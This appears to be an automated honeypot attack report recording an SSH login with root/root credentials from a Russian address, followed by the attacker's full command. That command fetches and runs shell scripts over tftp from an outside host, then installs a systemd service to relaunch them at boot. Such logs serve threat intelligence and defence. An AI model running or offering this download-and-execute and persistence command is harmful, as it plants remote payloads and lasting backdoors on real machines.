Attack Report for Observation

Header

Time: 2024/11/22, 08:00:01 (GMT)
Transaction ID: 9JH6JRB2ZUZ666E3
Service: ssh
Location: RU (Russia)
Attacker: 147.45.47.117
Classification: Security execution
Harm Potential: High
Description: Command execution for security vulnerability

Content

147.45.47.117 client username 'root' and password 'root' entered
147.45.47.117 client command : 'cd /home && mkdir xbin3 && cd /home/xbin3 || cd /var/run || cd /mnt || cd /root || cd /; tftp 45.125.66.215 -c get tftp1.sh && chmod 777 tftp1.sh && sh tftp1.sh && tftp -r tftp2.sh -g 45.125.66.215 && chmod 777 tftp2.sh && sh tftp2.sh; echo -e "[Unit]
Description=My Service

[Service]
ExecStart=/bin/bash /home/xbin3/tftp1.sh
Restart=on-failure

[Install]
WantedBy=multi-user.target" > /etc/systemd/system/my2_service2.service && chmod 777 /etc/systemd/system/my2_service2.service && chmod +x /home/xbin3/tftp1.sh && systemctl daemon-reload && systemctl start my2_service2.service && systemctl enable my2_service2.service'

All observations come from the honeypot central database.
